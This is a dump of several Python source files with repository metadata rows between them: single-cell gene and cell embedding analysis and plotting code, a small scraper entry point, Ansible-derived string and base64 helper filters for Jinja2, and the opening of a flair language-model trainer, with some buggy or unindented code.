        ctypes, _ = self.group_cell_vectors(barcode_to_label)
        clusters = list(vectors.keys())
        celltypes = list(ctypes.keys())
        matrix = []
        for cluster, genes in vectors.items():
            vector = self.embed.generate_vector(genes)
            row = []
            for cell in celltypes:
                distance = float(cosine_similarity(numpy.array(ctypes[cell]).reshape(1, -1), numpy.array(vector).reshape(1, -1))[0])
                row.append(distance)
            matrix.append(row)
        matrix = numpy.array(matrix)
        # Rows are gene-set clusters, columns are cell-type groups.
        df = pandas.DataFrame(matrix, index=clusters, columns=celltypes)
        sns.clustermap(df, figsize=(17, 8))
        plt.tight_layout()
        if png:
            plt.savefig(png)
        else:
            plt.show()
from sklearn.manifold import TSNE
from sklearn.cluster import AgglomerativeClustering, KMeans
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import matplotlib
import seaborn as sns
import pandas
import matplotlib.cm as cm
import umap
import tqdm
import scanpy as sc
import matplotlib.gridspec as gridspec
import networkx as nx
import numpy
import operator
import random
import pickle
import collections
import sys
import os
class GeneEmbedding(object):
def __init__(self, embedding_file, context):
self.vector = []
self.context = context
self.embedding_file = embedding_file
self.embeddings = self.read_embedding(self.embedding_file)
self.vector = []
self.genes = []
for gene in tqdm.tqdm(self.context.expressed_genes):
if gene in self.embeddings:
self.vector.append(self.embeddings[gene])
self.genes.append(gene)
def read_embedding(self, filename):
embedding = dict()
lines = open(filename,"r").read().splitlines()[1:]
for line in lines:
vector = line.split()
gene = vector.pop(0)
embedding[gene] = [float(x) for x in vector]
return embedding
def compute_similarities(self, gene, subset=None):
print("hit")
if gene not in self.embeddings:
return None
embedding = self.embeddings[gene]
distances = dict()
if subset:
targets = set(list(self.embeddings.keys())).intersection(set(subset))
else:
targets = list(self.embeddings.keys())
for target in targets:
if target not in self.embeddings:
continue
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(embedding).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
genes = [x[0] for x in sorted_distances]
distance = [x[1] for x in sorted_distances]
df = pandas.DataFrame.from_dict({"Gene":genes, "Similarity":distance})
return df
def cluster(self, n=12):
kmeans = KMeans(n_clusters=n)
kmeans.fit(self.vector)
clusters = kmeans.labels_
clusters = zip(self.context.expressed_genes, clusters)
_clusters = []
for gene, cluster in clusters:
_clusters.append("G"+str(cluster))
return _clusters
def clusters(self, clusters):
average_vector = dict()
gene_to_cluster = collections.defaultdict(list)
matrix = collections.defaultdict(list)
total_average_vector = []
for gene, cluster in zip(self.context.expressed_genes, clusters):
if gene in self.embeddings:
matrix[cluster].append(self.embeddings[gene])
gene_to_cluster[cluster].append(gene)
total_average_vector.append(self.embeddings[gene])
self.total_average_vector = list(numpy.average(total_average_vector, axis=0))
for cluster, vectors in matrix.items():
xvec = list(numpy.average(vectors, axis=0))
average_vector[cluster] = numpy.subtract(xvec,self.total_average_vector)
return average_vector, gene_to_cluster
def generate_vector(self, genes):
vector = []
for gene, vec in zip(self.genes, self.vector):
if gene in genes:
vector.append(vec)
return list(numpy.median(vector, axis=0))
def cluster_definitions(self, clusters):
average_vector, gene_to_cluster = self.clusters(clusters)
similarities = collections.defaultdict(dict)
for cluster, vector in average_vector.items():
distances = dict()
for target in gene_to_cluster[cluster]:
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
similarities[cluster] = [x[0] for x in sorted_distances if x[0]]
return similarities
def cluster_definitions_as_df(self, similarities, top_n=20):
clusters = []
symbols = []
for key, genes in similarities.items():
clusters.append(key)
symbols.append(", ".join(genes[:top_n]))
df = pandas.DataFrame.from_dict({"Cluster Name":clusters, "Top Genes":symbols})
return df
def plot(self, clusters, png=None, method="TSNE", labels=[], pcs=None, remove=[]):
plt.figure(figsize = (8, 8))
ax = plt.subplot(1,1,1)
pcs = self.plot_reduction(clusters, ax, labels=labels, method=method, pcs=pcs, remove=remove)
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_reduction(self, clusters, ax, method="TSNE", labels=[], pcs=None, remove=[]):
if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.vector)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.vector)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
if len(remove) != 0:
_pcsx = []
_pcsy = []
_clusters = []
for x, y, c in zip(pcs[0],pcs[1],clusters):
if c not in remove:
_pcsx.append(x)
_pcsy.append(y)
_clusters.append(c)
pcs = []
pcs.append(_pcsx)
pcs.append(_pcsy)
clusters = _clusters
data = {"x":pcs[0],"y":pcs[1], "Cluster":clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y",hue="Cluster", ax=ax)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax.set_xticks([])
ax.set_yticks([])
if len(labels):
for x, y, gene in zip(pcs[0], pcs[1], self.context.expressed_genes):
if gene in labels:
ax.text(x+.02, y, str(gene), fontsize=8)
return pcs
def subtract_vector(self, vector):
for gene, vec in self.embeddings.items():
vec = numpy.subtract(vec-vector)
self.embeddings[gene] = vec
@staticmethod
def relabel_cluster(similarities, clusters, old_label, new_label):
genes = similarities[old_label]
del similarities[old_label]
similarities[new_label] = genes
_clusters = []
for cluster in clusters:
if cluster == old_label:
_clusters.append(new_label)
else:
_clusters.append(cluster)
return similarities, _clusters
def plot_similarity_matrix(self, markers, marker_labels=None, png=None):
cmap = matplotlib.cm.tab20
if marker_labels:
marker_colors = {}
ctypes = []
for value in marker_labels.values():
ctypes.append(value)
ctypes = list(set(ctypes))
for key, value in marker_labels.items():
marker_colors[key] = cmap(ctypes.index(value))
colors = pandas.DataFrame(markers)[0].map(marker_colors)
similarity_matrix = []
print("Running")
markers = set(list(self.embeddings.keys())).intersection(set(markers))
markers = list(markers)
for marker in markers:
print(marker)
row = []
res = self.compute_similarities(marker, subset=markers)
resdict = dict(zip(res["Gene"],res["Similarity"]))
for gene in markers:
row.append(resdict[gene])
similarity_matrix.append(row)
plt.figure(figsize = (12, 10))
matrix = numpy.array(similarity_matrix)
df = pandas.DataFrame(matrix,index=markers,columns=markers)
sns.clustermap(df,figsize=(12,8), dendrogram_ratio=0.1)
plt.tight_layout()
if png:
plt.savefig("marker_similarity.png")
else:
plt.show()
    def plot_similarity_network(self, markers, marker_labels=None, png=None):
        """Draw a network linking each marker gene to its ten most similar genes.

        NOTE(review): despite the ``marker_labels=None`` default, the loop below
        reads ``marker_labels.values()`` unconditionally when adding neighbour
        nodes, so this raises AttributeError when no labels are supplied --
        confirm intended usage.
        """
        cmap = matplotlib.cm.tab20
        # Start from the 10-node Petersen graph purely to obtain a graph object;
        # its placeholder integer nodes are removed again further down.
        G = nx.petersen_graph()
        node_color = []
        node_order = []
        node_size = []
        edge_order = []
        edge_color = []
        edge_labels = dict()
        for marker in markers:
            node_order.append(marker)
            if marker_labels:
                # Color markers by the index of their cell-type label.
                ctypes = []
                for value in marker_labels.values():
                    ctypes.append(value)
                ctypes = list(set(ctypes))
                node_color.append(ctypes.index(marker_labels[marker]))
            node_size.append(400)
            G.add_node(marker)
        for marker in markers:
            res = self.compute_similarities(marker)
            resdict = dict(zip(res["Gene"],res["Similarity"]))
            i = 0
            # Keep only the ten nearest neighbours per marker.
            for gene, similarity in resdict.items():
                if i > 9: break
                if gene != marker:
                    if gene not in G.nodes():
                        # Neighbour-only genes are drawn invisibly (size 0) and
                        # get the color index one past the label range.
                        node_size.append(0)
                        G.add_node(gene)
                        node_order.append(gene)
                        node_color.append(len(set(marker_labels.values())))
                    print(marker, gene)
                    G.add_edge(marker, gene, weight=similarity)
                    edge_color.append(similarity)
                    edge_order.append((marker,gene))
                    edge_labels[(marker,gene)] = str(round(similarity,2))
                    i += 1
        # Drop the ten integer nodes inherited from the Petersen seed graph.
        for i in range(10):
            G.remove_node(i)
        print(G.nodes())
        print(G.edges())
        fig = plt.figure(figsize=(8,8))
        ax = plt.subplot(1,1,1)
        # Graphviz "neato" layout; requires pygraphviz/agraph at runtime.
        pos = nx.nx_agraph.graphviz_layout(G, prog="neato",args="-Goverlap=scale -Elen=5 -Eweight=0.2")
        nx.draw(G,pos,ax=ax, cmap=cmap,nodelist=node_order, node_size=node_size,edgelist=edge_order, node_color=node_color, edge_color=edge_color, edge_vmin=0, edge_vmax=1.0, edge_cmap=plt.cm.Greys, with_labels=True, width=1,font_size=7)
        nx.draw_networkx_edge_labels(G,pos,edge_labels=edge_labels, font_size=6)
        plt.axis('off')
        plt.tight_layout()
        if png:
            plt.savefig(png)
        else:
            plt.show()
class CellEmbedding(object):
    """Cell-level embeddings derived from weighted averages of gene embeddings.

    Each cell vector is the expression-weighted mean of the embeddings of the
    genes it expresses, re-centered by subtracting the dataset-wide mean
    gene vector.
    """

    def __init__(self, context, embed):
        # context: experiment container (cell_to_gene, expression, metadata);
        # embed: gene-embedding object whose .embeddings maps gene -> vector.
        cell_to_gene = list(context.cell_to_gene.items())
        self.context = context
        self.embed = embed
        self.expression = context.expression
        self.data = collections.defaultdict(list)
        self.weights = collections.defaultdict(list)
        for cell, genes in tqdm.tqdm(cell_to_gene):
            # Cells with fewer than two genes carry no usable signal.
            if len(genes) < 2: continue
            if cell in self.expression:
                cell_weights = self.expression[cell]
                # Only genes that are both expressed and embedded contribute.
                for gene in set(genes).intersection(set(embed.embeddings.keys())):
                    if gene in cell_weights:
                        weight = self.expression[cell][gene]
                        if weight > 0:
                            self.data[cell].append(embed.embeddings[gene])
                            self.weights[cell].append(weight)
        self.matrix = []
        dataset_vector = []
        for cell, vectors in self.data.items():
            weights = self.weights[cell]
            # Expression-weighted mean of this cell's gene vectors.
            xvec = list(numpy.average(vectors, axis=0, weights=weights))
            self.matrix.append(xvec)
            dataset_vector += vectors
        # Unweighted mean over every contributing gene vector in the dataset.
        self.dataset_vector = numpy.average(dataset_vector, axis=0)
        _matrix = []
        for vec in self.matrix:
            # Center each cell vector on the dataset mean.
            _matrix.append(numpy.subtract(vec, self.dataset_vector))
        self.matrix = _matrix
    def batch_correct(self, column=None, clusters=None):
        """Shift per-(cluster, batch) cell vectors onto a reference batch.

        For every cluster the first batch seen acts as the reference; every
        other batch in that cluster is translated by the offset between the two
        batch centroids.  ``self.matrix`` is rebuilt in place and
        ``self.cell_order`` records the cell ordering.

        NOTE(review): ``max_distance`` starts at 1.0 and cosine similarity never
        exceeds 1.0, so the guard below is effectively taken on the first
        comparison; the similarity recomputed after the shift is discarded --
        confirm whether that is intentional.
        """
        if not column or not clusters:
            raise ValueError("Must supply batch column and clusters!")
        column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
        labels = []
        for key in self.data.keys():
            labels.append(column_labels[key])
        local_correction = collections.defaultdict(lambda : collections.defaultdict(list))
        correction_vectors = collections.defaultdict(dict)
        # Group every cell vector by (cluster, batch).
        for cluster, batch, vec in zip(clusters, labels, self.matrix):
            local_correction[cluster][batch].append(vec)
        for cluster, batches in local_correction.items():
            cluster_vec = []
            batch_keys = list(batches.keys())
            # The first batch of the cluster provides the reference centroid.
            base_batch = batch_keys.pop(0)
            max_distance = 1.0
            cluster_vec = numpy.average(batches[base_batch], axis=0)
            for batch in batch_keys:
                bvec = list(numpy.average(batches[batch], axis=0))
                distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
                if max_distance > distance:
                    max_distance = distance
                    # Offset that moves this batch centroid onto the reference.
                    offset = numpy.subtract(cluster_vec,bvec)
                    bvec = numpy.add(bvec,offset)
                    distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
                    correction_vectors[cluster][batch] = offset
        self.matrix = []
        self.sample_vector = collections.defaultdict(list)
        i = 0
        self.cell_order = []
        for cell, vectors in self.data.items():
            cluster = clusters[i]
            # NOTE(review): vectors are re-averaged here WITHOUT expression
            # weights, unlike __init__ -- confirm this asymmetry is intended.
            xvec = list(numpy.average(vectors, axis=0))
            batch = column_labels[cell]
            if cluster in correction_vectors and batch in correction_vectors[cluster]:
                offset = correction_vectors[cluster][batch]
                xvec = numpy.add(xvec,offset)
            self.matrix.append(xvec)
            self.cell_order.append(cell)
            i += 1
def cluster(self, k=12):
kmeans = KMeans(n_clusters=k)
kmeans.fit(self.matrix)
clusters = kmeans.labels_
_clusters = []
for cluster in clusters:
_clusters.append("C"+str(cluster))
self.clusters = _clusters
return _clusters
def subtract_vector(self, vector):
corrected_matrix = []
for cell_vector in self.matrix:
corrected_matrix.append(numpy.subtract(cell_vector, vector))
self.matrix = corrected_matrix
def compute_gene_similarities(self):
gene_similarities = dict()
vectors = collections.defaultdict(list)
for vec, label in zip(self.matrix, self.clusters):
vectors[label].append(vec)
for label, vecs in vectors.items():
distances = dict()
cell_vector = list(numpy.mean(vecs, axis=0))
for gene, vector in self.embed.embeddings.items():
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances[gene] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
gene_similarities[label] = [x[0] for x in sorted_distances]
print(label, sorted_distances[:10])
return gene_similarities
    def group_cell_vectors(self, barcode_to_label):
        """Aggregate cell vectors per label (e.g. per cell type).

        First pass: per-label median vector from the raw cell vectors.
        Second pass: each cell's vectors are re-centered by that label median
        and the label's entry is recomputed from the centered vectors.

        NOTE(review): in both passes, cells sharing a label overwrite each
        other's entry in ``label_vector``, so the result reflects the *last*
        cell seen for each label rather than an aggregate over all of them --
        confirm this is intended.
        """
        label_vector = dict()
        labels = []
        for cell, vectors in self.data.items():
            vector = list(numpy.median(vectors, axis=0))
            labels.append(barcode_to_label[cell])
            label_vector[barcode_to_label[cell]] = vector
        for cell, vectors in self.data.items():
            _vectors = []
            for vector in vectors:
                _vectors.append(numpy.subtract(vector, label_vector[barcode_to_label[cell]]))
            vectors = _vectors
            vector = list(numpy.median(vectors, axis=0))
            label_vector[barcode_to_label[cell]] = vector
        return label_vector, labels
def compute_cell_similarities(self, barcode_to_label):
vectors = dict()
cell_similarities = dict()
vectors, labels = self.group_cell_vectors(barcode_to_label)
for label, vector in vectors.items():
distances = dict()
for label2, vector2 in vectors.items():
xdist = []
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(vector2).reshape(1, -1))[0])
xdist.append(distance)
distances[label2] = distance
cell_similarities[label] = distances
return cell_similarities
def plot_reduction(self, ax, pcs=None, method="TSNE", clusters=None, labels=None):
if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.matrix)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
data = {"x":pcs[0],"y":pcs[1],"Cluster": clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Cluster', ax=ax,linewidth=0.1,s=13,alpha=1.0)
return pcs
def plot(self, png=None, pcs=None, method="TSNE", column=None):
if column:
column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
labels = []
for key in self.data.keys():
labels.append(column_labels[key])
else:
labels = self.clusters
plt.figure(figsize = (8, 8))
ax1 = plt.subplot(1,1,1)
pcs = self.plot_reduction(ax1, pcs=pcs, clusters=labels, method=method)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax1.set_xticks([])
ax1.set_yticks([])
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_distance(self, vector, pcs=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
distances = []
dataset_distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(self.dataset_vector).reshape(1, -1))[0])
for cell_vector in self.matrix:
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances.append(distance-dataset_distance)
data = {"x":pcs[0],"y":pcs[1],"Distance": distances}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Distance', ax=ax,linewidth=0.00,s=7,alpha=0.7)
return pcs
def plot_gene_tsne(self, title, ax, genes, pcs=None):
expression = [0 for _ in range(len(list(self.data.keys())))]
for gene in genes:
for i, cell in enumerate(self.data.keys()):
if gene in self.expression[cell]:
expression[i] += self.expression[cell][gene]
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
data = {"x":pcs[0],"y":pcs[1],"Gene Expression": expression}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Gene Expression', ax=ax,linewidth=0.00,s=7,alpha=0.7)
ax.set_title(title,fontsize=16)
return pcs
def plot_gene_expression(self, genes, pcs=None, png=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
pcs = self.plot_gene_tsne(",".join(genes[:10]), ax, genes, pcs=pcs)
ax.set_xticks([])
ax.set_yticks([])
if not png:
plt.show()
else:
plt.savefig(png)
plt.close()
return pcs
def plot_similarity_matrix(self, vectors, column):
similarity_matrix = []
plt.figure(figsize = (12, 10))
barcode_to_label = dict(zip(cembed.context.metadata.index, cembed.context.metadata[column]))
ctypes = cembed.group_cell_vectors()
matrix = []
clusters = list(vectors.keys())
celltypes = list(cytpes.keys())
for cluster, genes in vectors.items():
vector = embed.generate_vector(genes)
row = []
for cell in ctypes.keys():
distance = float(cosine_similarity(numpy.array(ctypes[cell]).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
row.append()
matrix.append(row)
matrix = numpy.array(matrix)
df = pandas.DataFrame(matrix,index=celltypes,columns=celltypes)
sns.clustermap(df,figsize=(17,8))
plt.tight_layout()
plt.savefig(os.path.join(output_path,"celltype_similarities_{}.png".format(sample))) | true | true |
f7327fac62add1269af1efbeb3c9b14e1e8be449 | 92 | py | Python | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | from scraper import scrape
def main():
scrape()
if __name__ == '__main__':
main()
| 11.5 | 26 | 0.630435 | from scraper import scrape
def main():
scrape()
if __name__ == '__main__':
main()
| true | true |
f7328057087962ad9e6c08863139837e1f659948 | 5,366 | py | Python | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | null | null | null | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | 7 | 2021-10-08T09:19:12.000Z | 2022-03-29T15:22:06.000Z | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | null | null | null | # NOTE: These are taken from the jinja2-ansible-filters package:
# NOTE: https://pypi.org/project/jinja2-ansible-filters
# NOTE: The installer has a problem in its egg-info preventing a regular pip install.
# NOTE: If we do not need the b64encode filter, we can omit this file and the filter setup.
# (c) 2012, Jeroen Hoekx <jeroen@hoekx.be>
#
# This file was ported from Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import codecs
# Python 2/3 compatibility aliases used by the type checks in to_bytes/to_text.
try:
    string_types = basestring,
    integer_types = (int, long)
    # NOTE(review): `types` is never imported, so even on Python 2 this line
    # would raise NameError and fall through to the Python 3 branch -- confirm.
    class_types = (type, types.ClassType)
    text_type = unicode
    binary_type = str
    from collections import Sequence
except NameError:
    # Python3.x environment
    string_types = str
    integer_types = int
    class_types = type
    text_type = str
    binary_type = bytes
# "surrogateescape" is registered on Python 3; probe for it once.
try:
    codecs.lookup_error("surrogateescape")
    HAS_SURROGATEESCAPE = True
except LookupError:
    HAS_SURROGATEESCAPE = False
# Composed error-handler names that to_bytes/to_text map onto real codec
# error handlers depending on surrogateescape availability.
_COMPOSED_ERROR_HANDLERS = frozenset((None, "surrogate_or_replace",
                                      "surrogate_or_strict",
                                      "surrogate_then_replace"))
def to_bytes(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
    """Return *obj* as a byte string.

    Text is encoded with *encoding*; composed *errors* names (see
    _COMPOSED_ERROR_HANDLERS) are mapped onto real codec error handlers,
    degrading gracefully when "surrogateescape" is unavailable.  Non-string
    objects are handled per *nonstring*: "simplerepr" (default) stringifies
    them, "passthru" returns them unchanged, "empty" yields b"", "strict"
    raises TypeError.
    """
    if isinstance(obj, binary_type):
        return obj
    # We're given a text string
    # If it has surrogates, we know because it will decode
    original_errors = errors
    if errors in _COMPOSED_ERROR_HANDLERS:
        if HAS_SURROGATEESCAPE:
            errors = "surrogateescape"
        elif errors == "surrogate_or_strict":
            errors = "strict"
        else:
            errors = "replace"
    if isinstance(obj, text_type):
        try:
            # Try this first as it's the fastest
            return obj.encode(encoding, errors)
        except UnicodeEncodeError:
            if original_errors in (None, "surrogate_then_replace"):
                # Slow but works: round-trip through UTF-8, replacing whatever
                # the target encoding cannot represent.
                return_string = obj.encode("utf-8", "surrogateescape")
                return_string = return_string.decode("utf-8", "replace")
                return return_string.encode(encoding, "replace")
            raise
    # Note: We do these last even though we have to call to_bytes again on the
    # value because we're optimizing the common case
    if nonstring == "simplerepr":
        try:
            value = str(obj)
        except UnicodeError:
            try:
                value = repr(obj)
            except UnicodeError:
                # Giving up
                return to_bytes("")
    elif nonstring == "passthru":
        return obj
    elif nonstring == "empty":
        # python2.4 doesn't have b''
        return to_bytes("")
    elif nonstring == "strict":
        raise TypeError("obj must be a string type")
    else:
        raise TypeError(
            "Invalid value %s for to_bytes' nonstring parameter" % nonstring)
    return to_bytes(value, encoding, errors)
def to_text(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
    """Return *obj* as a text string (mirror of ``to_bytes``).

    Bytes are decoded with *encoding*; composed *errors* names are resolved
    exactly as in ``to_bytes``.  Non-string objects are handled per
    *nonstring* with the same options as ``to_bytes``.
    """
    if isinstance(obj, text_type):
        return obj
    if errors in _COMPOSED_ERROR_HANDLERS:
        if HAS_SURROGATEESCAPE:
            errors = "surrogateescape"
        elif errors == "surrogate_or_strict":
            errors = "strict"
        else:
            errors = "replace"
    if isinstance(obj, binary_type):
        # Note: We don't need special handling for surrogate_then_replace
        # because all bytes will either be made into surrogates or are valid
        # to decode.
        return obj.decode(encoding, errors)
    # Note: We do these last even though we have to call to_text again on the
    # value because we're optimizing the common case
    if nonstring == "simplerepr":
        try:
            value = str(obj)
        except UnicodeError:
            try:
                value = repr(obj)
            except UnicodeError:
                # Giving up
                return u""
    elif nonstring == "passthru":
        return obj
    elif nonstring == "empty":
        return u""
    elif nonstring == "strict":
        raise TypeError("obj must be a string type")
    else:
        raise TypeError(
            "Invalid value %s for to_text's nonstring parameter" % nonstring)
    return to_text(value, encoding, errors)
def b64encode(string, encoding="utf-8"):
    """Base64-encode *string* (encoded with *encoding*) and return text."""
    raw = to_bytes(string, encoding=encoding, errors="surrogate_or_strict")
    return to_text(base64.b64encode(raw))
class FilterModule(object):
    """ Ansible core jinja2 filters """

    def filters(self):
        """Return the mapping of Jinja2 filter names to callables."""
        filter_map = {
            # base 64
            "b64encode": b64encode,
        }
        return filter_map
| 32.521212 | 91 | 0.62691 |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import codecs
# Python 2/3 compatibility aliases used by the type checks in to_bytes/to_text.
try:
    string_types = basestring,
    integer_types = (int, long)
    # NOTE(review): `types` is never imported, so even on Python 2 this line
    # would raise NameError and fall through to the Python 3 branch -- confirm.
    class_types = (type, types.ClassType)
    text_type = unicode
    binary_type = str
    from collections import Sequence
except NameError:
    # Python 3.x environment
    string_types = str
    integer_types = int
    class_types = type
    text_type = str
    binary_type = bytes
# "surrogateescape" is registered on Python 3; probe for it once.
try:
    codecs.lookup_error("surrogateescape")
    HAS_SURROGATEESCAPE = True
except LookupError:
    HAS_SURROGATEESCAPE = False
# Composed error-handler names that to_bytes/to_text map onto real codec
# error handlers depending on surrogateescape availability.
_COMPOSED_ERROR_HANDLERS = frozenset((None, "surrogate_or_replace",
                                      "surrogate_or_strict",
                                      "surrogate_then_replace"))
def to_bytes(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
    """Return *obj* as a byte string.

    Text is encoded with *encoding*; composed *errors* names (see
    _COMPOSED_ERROR_HANDLERS) are mapped onto real codec error handlers,
    degrading gracefully when "surrogateescape" is unavailable.  Non-string
    objects are handled per *nonstring*: "simplerepr" (default) stringifies
    them, "passthru" returns them unchanged, "empty" yields b"", "strict"
    raises TypeError.
    """
    if isinstance(obj, binary_type):
        return obj
    # If it has surrogates, we know because it will decode
    original_errors = errors
    if errors in _COMPOSED_ERROR_HANDLERS:
        if HAS_SURROGATEESCAPE:
            errors = "surrogateescape"
        elif errors == "surrogate_or_strict":
            errors = "strict"
        else:
            errors = "replace"
    if isinstance(obj, text_type):
        try:
            # Try this first as it's the fastest
            return obj.encode(encoding, errors)
        except UnicodeEncodeError:
            if original_errors in (None, "surrogate_then_replace"):
                # Round-trip through UTF-8, replacing whatever the target
                # encoding cannot represent.
                return_string = obj.encode("utf-8", "surrogateescape")
                return_string = return_string.decode("utf-8", "replace")
                return return_string.encode(encoding, "replace")
            raise
    # Non-string handling is done last to keep the common case fast.
    if nonstring == "simplerepr":
        try:
            value = str(obj)
        except UnicodeError:
            try:
                value = repr(obj)
            except UnicodeError:
                # Giving up
                return to_bytes("")
    elif nonstring == "passthru":
        return obj
    elif nonstring == "empty":
        # python2.4 doesn't have b''
        return to_bytes("")
    elif nonstring == "strict":
        raise TypeError("obj must be a string type")
    else:
        raise TypeError(
            "Invalid value %s for to_bytes' nonstring parameter" % nonstring)
    return to_bytes(value, encoding, errors)
def to_text(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
    """Return *obj* as a text string (mirror of ``to_bytes``).

    Bytes are decoded with *encoding*; composed *errors* names are resolved
    exactly as in ``to_bytes``.  Non-string objects are handled per
    *nonstring* with the same options as ``to_bytes``.
    """
    if isinstance(obj, text_type):
        return obj
    if errors in _COMPOSED_ERROR_HANDLERS:
        if HAS_SURROGATEESCAPE:
            errors = "surrogateescape"
        elif errors == "surrogate_or_strict":
            errors = "strict"
        else:
            errors = "replace"
    if isinstance(obj, binary_type):
        # Note: We don't need special handling for surrogate_then_replace
        # because all bytes will either be made into surrogates or are valid
        # to decode.
        return obj.decode(encoding, errors)
    # Non-string handling is done last to keep the common case fast.
    if nonstring == "simplerepr":
        try:
            value = str(obj)
        except UnicodeError:
            try:
                value = repr(obj)
            except UnicodeError:
                # Giving up
                return u""
    elif nonstring == "passthru":
        return obj
    elif nonstring == "empty":
        return u""
    elif nonstring == "strict":
        raise TypeError("obj must be a string type")
    else:
        raise TypeError(
            "Invalid value %s for to_text's nonstring parameter" % nonstring)
    return to_text(value, encoding, errors)
def b64encode(string, encoding="utf-8"):
    """Base64-encode *string* (encoded with *encoding*) and return text."""
    raw = to_bytes(string, encoding=encoding, errors="surrogate_or_strict")
    return to_text(base64.b64encode(raw))
class FilterModule(object):
    """Ansible core jinja2 filters."""

    def filters(self):
        """Return the mapping of Jinja2 filter names to callables."""
        filter_map = {
            "b64encode": b64encode,
        }
        return filter_map
| true | true |
f7328081f748a48e3cf5d90ec0297525e64a80a6 | 15,124 | py | Python | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null |
import time
import datetime
import random
import sys
import logging
from pathlib import Path
from typing import Union
from torch import cuda
from torch.utils.data import Dataset, DataLoader
from torch.optim.sgd import SGD
try:
from apex import amp
except ImportError:
amp = None
import flair
from flair.data import Dictionary
from flair.models import LanguageModel
from flair.optim import *
from flair.training_utils import add_file_handler
log = logging.getLogger('flair')
class TextDataset(Dataset):
    """Dataset yielding one tensor of token ids per text file.

    *path* may be a single file or a directory of files.  Each item is a 1-D
